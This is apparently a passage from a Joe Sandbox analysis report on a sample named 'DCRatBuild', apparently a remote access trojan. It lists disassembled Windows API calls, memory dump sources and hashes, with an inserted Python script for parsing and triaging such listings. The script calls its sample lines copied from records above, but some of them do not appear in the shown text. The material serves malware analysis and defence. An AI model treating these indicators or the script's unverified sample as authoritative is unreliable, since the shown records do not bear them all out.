                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004B3F73,00000000,00000000,?,004BACDB,004B3F73,00000000,00000000,00000000,?,004BAED8,00000006,FlsSetValue), ref: 004BAD66
                                                                                                                        • GetLastError.KERNEL32(?,004BACDB,004B3F73,00000000,00000000,00000000,?,004BAED8,00000006,FlsSetValue,004C7970,FlsSetValue,00000000,00000364,?,004B98B7), ref: 004BAD72
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004BACDB,004B3F73,00000000,00000000,00000000,?,004BAED8,00000006,FlsSetValue,004C7970,FlsSetValue,00000000), ref: 004BAD80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3177248105-0
                                                                                                                        • Opcode ID: 9d19c87da650f02721125c2b81950bfa8cf715406e70e195a7f3c0e0c6c9b4b8
                                                                                                                        • Instruction ID: 8bb4b808ccd70a99e5081395376000e0094ee121768f1556ca7ef1c12b08bbb1
                                                                                                                        • Opcode Fuzzy Hash: 9d19c87da650f02721125c2b81950bfa8cf715406e70e195a7f3c0e0c6c9b4b8
                                                                                                                        • Instruction Fuzzy Hash: AE014732201222ABC7218F68DC44EDB7B5DEF407A37100231F906D3660CB28C822C6FA
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004B97E5: GetLastError.KERNEL32(?,004D1030,004B4674,004D1030,?,?,004B3F73,00000050,?,004D1030,00000200), ref: 004B97E9
                                                                                                                          • Part of subcall function 004B97E5: _free.LIBCMT ref: 004B981C
                                                                                                                          • Part of subcall function 004B97E5: SetLastError.KERNEL32(00000000,?,004D1030,00000200), ref: 004B985D
                                                                                                                          • Part of subcall function 004B97E5: _abort.LIBCMT ref: 004B9863
                                                                                                                          • Part of subcall function 004BBB4E: _abort.LIBCMT ref: 004BBB80
                                                                                                                          • Part of subcall function 004BBB4E: _free.LIBCMT ref: 004BBBB4
                                                                                                                          • Part of subcall function 004BB7BB: GetOEMCP.KERNEL32(00000000,?,?,004BBA44,?), ref: 004BB7E6
                                                                                                                        • _free.LIBCMT ref: 004BBA9F
                                                                                                                        • _free.LIBCMT ref: 004BBAD5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorLast_abort
                                                                                                                        • String ID: pL
                                                                                                                        • API String ID: 2991157371-1374626527
                                                                                                                        • Opcode ID: 0069e2de2aea130b9e07687e18c3d781ad9644e8e078d5c100071c7cb1eb63b7
                                                                                                                        • Instruction ID: 005c2018427a15d3c1ea3c883fc206513f2c0ae975ab41c5b51d66e70691a24e
                                                                                                                        • Opcode Fuzzy Hash: 0069e2de2aea130b9e07687e18c3d781ad9644e8e078d5c100071c7cb1eb63b7
                                                                                                                        • Instruction Fuzzy Hash: 3D31D531D04109AFDB10DFA9C441BDEB7E5EF54324F21409FE5049B2A1EBBA5D41DBA8
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: (J$PDu<J
                                                                                                                        • API String ID: 1269201914-3276689922
                                                                                                                        • Opcode ID: 2c74f241c802f2710a1d4655879051bcc1f52a069def1e4c5aaacec5ce08dadd
                                                                                                                        • Instruction ID: 1a5d1e17c1f4a0b83b8285f124b488c7e61ac094093aa05e74ac428686b3de1c
                                                                                                                        • Opcode Fuzzy Hash: 2c74f241c802f2710a1d4655879051bcc1f52a069def1e4c5aaacec5ce08dadd
                                                                                                                        • Instruction Fuzzy Hash: 2CB012C5B590407C3144714B2E02E3B050CC1D7F1D330C02FF528C1084EC4D0C02043E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: 2J$PDu<J
                                                                                                                        • API String ID: 1269201914-3862107174
                                                                                                                        • Opcode ID: 98b52c870afe322abd42b3e42096e2d2bdb058c7acd54bebc24b78b99ba340d8
                                                                                                                        • Instruction ID: bf888223c50faedb38dc3a61e2e0844da27ff30afcc11fe6e05dd8bce0ca49da
                                                                                                                        • Opcode Fuzzy Hash: 98b52c870afe322abd42b3e42096e2d2bdb058c7acd54bebc24b78b99ba340d8
                                                                                                                        • Instruction Fuzzy Hash: 1EB09285A590007D2144614A2902E3A0108C196B19330802FF428C1084A84C0C01043E
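The API listings above are the part of a Joe Sandbox function record an analyst most often wants to process in bulk: the call site ("ref"), the module, the arguments, and the subcall attribution. A few of the raw arguments carry meaning once decoded: GetStdHandle's 000000F6 is STD_INPUT_HANDLE ((DWORD)-10, printed by the report with only its low byte), LoadLibraryExW's 00000800 is LOAD_LIBRARY_SEARCH_SYSTEM32, RaiseException's C06D0057 is a VcppException code (facility 0x6D) wrapping ERROR_INVALID_PARAMETER, and the sfxcmd/sfxpar environment variables are the ones WinRAR's SFX module sets, which fits the DCRatBuild snapshot name. The Python below is an added example written for this page, not Joe Sandbox or DCRat code: it parses lines of this exact format into records, converts each call site to an RVA against the memory dump base (00490000), decodes those constants and flags the SFX indicator. The sample listing is copied from the records above; the constant tables are deliberately limited to values that occur here plus a couple of neighbours, and the line regex is an assumption about the format derived from these lines.

```python
"""Added example (not Joe Sandbox code): parse the "APIs" lines of a function
listing into records, resolve a few argument constants and flag triage indicators."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional

IMAGE_BASE = 0x490000  # from the report: "Offset: 00490000, based on PE: true"

# Constructed sample: API lines copied from the function listings above.
SAMPLE_LISTING = """\
• SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004ADBF4
• SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004ADC30
• GetStdHandle.KERNEL32(000000F6), ref: 00499795
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004997AD
• GetLastError.KERNEL32 ref: 004997DF
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004B3F73,00000000,00000000,?,004BACDB,004B3F73,00000000,00000000,00000000,?,004BAED8,00000006,FlsSetValue), ref: 004BAD66
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
• _free.LIBCMT ref: 004BBA9F
"""

# Assumed line format, derived from the lines above: "• [Part of subcall function X: ]Api.MODULE[(args)], ref: ADDR"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_@][\w@]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX_RE = re.compile(r"-?[0-9A-Fa-f]{1,8}$")

# GetStdHandle takes (DWORD)-10/-11/-12; the report prints them as 000000F6 etc., so key on the low byte.
STD_HANDLES = {0xF6: "STD_INPUT_HANDLE", 0xF5: "STD_OUTPUT_HANDLE", 0xF4: "STD_ERROR_HANDLE"}
LOADLIB_FLAGS = {0x8: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
                 0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS"}  # small subset of the LoadLibraryEx flags
WIN32_ERRORS = {0x57: "ERROR_INVALID_PARAMETER", 0x7E: "ERROR_MOD_NOT_FOUND", 0x7F: "ERROR_PROC_NOT_FOUND"}
SFX_VARS = {"sfxcmd", "sfxpar", "sfxname"}  # environment variables set by WinRAR's SFX module


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int  # virtual address of the call site
    subcall_of: Optional[int] = None
    notes: List[str] = field(default_factory=list)

    @property
    def rva(self) -> int:
        """Offset usable against the memory dump, whose base is IMAGE_BASE."""
        return self.ref - IMAGE_BASE


def as_int(tok: str) -> Optional[int]:
    """Numeric argument as unsigned 32-bit; '?' and string arguments give None.
    Caveat: a short all-hex word such as 'ABC' would be misread as a number."""
    if not HEX_RE.match(tok):
        return None
    return int(tok, 16) & 0xFFFFFFFF


def decode_flags(v: int, table: dict) -> str:
    names = []
    for bit, name in sorted(table.items()):
        if v & bit:
            names.append(name)
            v &= ~bit
    if v:
        names.append(f"0x{v:X}")  # bits not covered by the table
    return "|".join(names) or "0 (default search order)"


def annotate(call: ApiCall) -> None:
    a0 = as_int(call.args[0]) if call.args else None
    if call.api == "GetStdHandle" and a0 is not None and (a0 & 0xFF) in STD_HANDLES:
        call.notes.append(f"nStdHandle = {STD_HANDLES[a0 & 0xFF]}")
    elif call.api == "LoadLibraryExW" and len(call.args) > 2:
        flags = as_int(call.args[2])
        if flags is not None:
            call.notes.append(f"dwFlags = {decode_flags(flags, LOADLIB_FLAGS)}")
    elif call.api == "RaiseException" and a0 is not None:
        facility, code = (a0 >> 16) & 0x1FFF, a0 & 0xFFFF
        if facility == 0x6D:  # FACILITY_VISUALCPP: code built by VcppException(ERROR_SEVERITY_ERROR, err)
            call.notes.append(f"exception code 0x{a0:08X} = VcppException({WIN32_ERRORS.get(code, hex(code))})")
        else:
            call.notes.append(f"exception code 0x{a0:08X}")
    elif call.api == "SetEnvironmentVariableW" and call.args and call.args[0] in SFX_VARS:
        call.notes.append(f"WinRAR SFX environment variable '{call.args[0]}'")


def parse_listing(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # "APIs", "Strings" and other non-call lines
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        call = ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None)
        annotate(call)
        calls.append(call)
    return calls


def triage(calls: List[ApiCall]) -> dict:
    sfx_vars = sorted({c.args[0] for c in calls
                       if c.api == "SetEnvironmentVariableW" and c.args and c.args[0] in SFX_VARS})
    return {"per_module": Counter(c.module for c in calls), "winrar_sfx": bool(sfx_vars), "sfx_vars": sfx_vars}


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for c in parsed:
        print(f"{c.ref:08X} (rva {c.rva:05X}) {c.api}.{c.module} {c.args} {c.notes}")
    print(triage(parsed))
```

Run it on the text of any function record (or the whole report's API listings concatenated) to get per-module call counts, RVAs that line up with the dump offsets, and the decoded constants; extend the tables only with values you have verified, since a wrong constant name in a triage note is worse than a raw hex value.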
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0049D343,00000001,?,?,?,00000000,004A551D,?,?,?), ref: 00499F9E
                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,004A551D,?,?,?,?,?,004A4FC7,?), ref: 00499FE5
                                                                                                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0049D343,00000001,?,?), ref: 0049A011
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite$Handle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4209713984-0
                                                                                                                        • Opcode ID: 164ee93f1c72ee4f11989e6abbfa79af2e2011f51b6891a8b1c072619d487278
                                                                                                                        • Instruction ID: 3c73ab59f8f6885aa4da923d9976fa8f16aa5e1838818900e3274d4fc829ccab
                                                                                                                        • Opcode Fuzzy Hash: 164ee93f1c72ee4f11989e6abbfa79af2e2011f51b6891a8b1c072619d487278
                                                                                                                        • Instruction Fuzzy Hash: 1431DF31204305AFDF14CF24D808B6BBBA5EB85715F04452EF98597290C779AD48CBAA
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0049C27E: _wcslen.LIBCMT ref: 0049C284
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A2D9
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A30C
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A329
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2260680371-0
                                                                                                                        • Opcode ID: e222f8c9fd9bdc8efadc2eb653d98122d538b4348404417dc39e9e0c715a2e21
                                                                                                                        • Instruction ID: 7fccb8d6cddeb8a14aaa0b87e4b444ce65ec6c6a0542c67e32da811409e9051d
                                                                                                                        • Opcode Fuzzy Hash: e222f8c9fd9bdc8efadc2eb653d98122d538b4348404417dc39e9e0c715a2e21
                                                                                                                        • Instruction Fuzzy Hash: 820192255002106AEF31AB764C49BEE3B889F0A789F14447AFD01E6285D75CDA91C6FE
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 004BB8B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Info
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1807457897-3916222277
                                                                                                                        • Opcode ID: 44ea6a0a98fb1bfa087ca551699269126b1047fd4b7336058cc803473aeb8f22
                                                                                                                        • Instruction ID: 5b6c3e691bf239673008b991ab808d470d06bd78d60143db9d2384651f98e850
                                                                                                                        • Opcode Fuzzy Hash: 44ea6a0a98fb1bfa087ca551699269126b1047fd4b7336058cc803473aeb8f22
                                                                                                                        • Instruction Fuzzy Hash: 63412AB050424C9EDB218E25CC84BF6BBB9DB15304F1404EED5DA86242D379AA45DFB5
                                                                                                                        APIs
                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 004BAFDD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String
                                                                                                                        • String ID: LCMapStringEx
                                                                                                                        • API String ID: 2568140703-3893581201
                                                                                                                        • Opcode ID: 4f4b8b20e85bafc3f928aa33b2f856bd50cc7b64c539f9139831f81b73a05117
                                                                                                                        • Instruction ID: 3fb5688165f4183036364ae8cc683a7321398414eaf71af90580bc8c85b1630e
                                                                                                                        • Opcode Fuzzy Hash: 4f4b8b20e85bafc3f928aa33b2f856bd50cc7b64c539f9139831f81b73a05117
                                                                                                                        • Instruction Fuzzy Hash: 87010C76505109BBCF029F91DC05EEE7F62EF09754F01415AFE1465160C63A8A31EF99
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,004BA56F), ref: 004BAF55
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                                                        • API String ID: 2593887523-3084827643
                                                                                                                        • Opcode ID: 4c816ac16a7b1bc89ce20806bc83fd6301df967f05ce27c6629251436ead4074
                                                                                                                        • Instruction ID: 126d486fbb0c382eca607db0c54d6c5c4d42824b6ae4df2fd1cb35485da61046
                                                                                                                        • Opcode Fuzzy Hash: 4c816ac16a7b1bc89ce20806bc83fd6301df967f05ce27c6629251436ead4074
                                                                                                                        • Instruction Fuzzy Hash: 57F0B475645208BFCF029F56CC02EEE7F61EF14B21B00407AFC0856260DA355A219B9E
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Alloc
                                                                                                                        • String ID: FlsAlloc
                                                                                                                        • API String ID: 2773662609-671089009
                                                                                                                        • Opcode ID: 8ce181107ad71a71292ff12394be7e4c7c92b1cebc37e8ee43bd831a6b5f2dc7
                                                                                                                        • Instruction ID: 07b7f67adbb9d426d09c39344570e2822d498ecb3c4d9b934986f8552739b369
                                                                                                                        • Opcode Fuzzy Hash: 8ce181107ad71a71292ff12394be7e4c7c92b1cebc37e8ee43bd831a6b5f2dc7
                                                                                                                        • Instruction Fuzzy Hash: 64E055706812087BD601AF66CC02FAEBB65CB14B21B0000AFF80093240CE385E108AEE
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: ec57b7563b1b155117b1308daa783101a5da3f031c408ae07dd6e63af0cd6ead
                                                                                                                        • Instruction ID: a0ad718b59f87a29033e8aa58ed64ea0d320700b2306aaa23693ab586bddc99d
                                                                                                                        • Opcode Fuzzy Hash: ec57b7563b1b155117b1308daa783101a5da3f031c408ae07dd6e63af0cd6ead
                                                                                                                        • Instruction Fuzzy Hash: D9B012E9258110FC310421471DC2D37110CC1D7B11330C43FFC25C0480D84CEC01043E
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
